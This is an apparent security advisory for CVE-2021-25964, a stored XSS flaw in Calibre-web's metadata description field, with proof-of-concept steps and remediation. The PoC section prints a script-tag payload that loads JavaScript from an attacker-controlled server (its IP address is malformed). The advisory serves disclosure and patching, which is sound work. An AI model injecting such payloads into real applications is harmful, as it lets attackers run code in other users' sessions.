icon

We found results for “

CVE-2021-25964

Date: October 4, 2021

Overview

In “Calibre-web” application, v0.6.0 to v0.6.12, are vulnerable to Stored XSS in “Metadata”. An attacker that has access to edit the metadata information, can inject JavaScript payload in the description field. When a victim tries to open the file, XSS will be triggered.

Details

The “Calibre-web” application is vulnerable to “Stored XSS” in Metadata. An attacker who has access to edit metadata information can inject JavaScript payload in the description field. When a victim tries to open the file, XSS will be triggered.

PoC Details

For demonstration purposes, we will use two users:
1. Alice, a low privileged user.
2. Admin, an administrator user.
Login into the application as Alice and open any ebook. Click on Edit Metadata. Now, click on save and intercept the request. Observe the parameter “description”, the content of it is sent inside HTML tags. Now inject the below payload immediately after the HTML tag and forward the request. The injected payload is saved in the file's metadata.
Login into application as Admin (victim). Now click on the ebook available on the dashboard, and notice the payload being triggered.

PoC Code

// Injected payload after the description parameter
<p>calibre Quick Start Guide</p><script src=http://192168.0.105:4444/xss.js></script>

// Contents of xss.js file hosted on the attacker’s server:
alert(“XSS”);

Affected Environments

Calibre-web versions v0.6.0 to v0.6.12

Prevention

Update to calibreweb version 0.6.13

Language: Python

Good to know:

icon
icon

Cross-Site Scripting (XSS)

CWE-79
icon

Upgrade Version

Upgrade to version calibreweb - 0.6.13

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): Single
Confidentiality (C): None
Integrity (I): Partial
Availability (A): None
Additional information: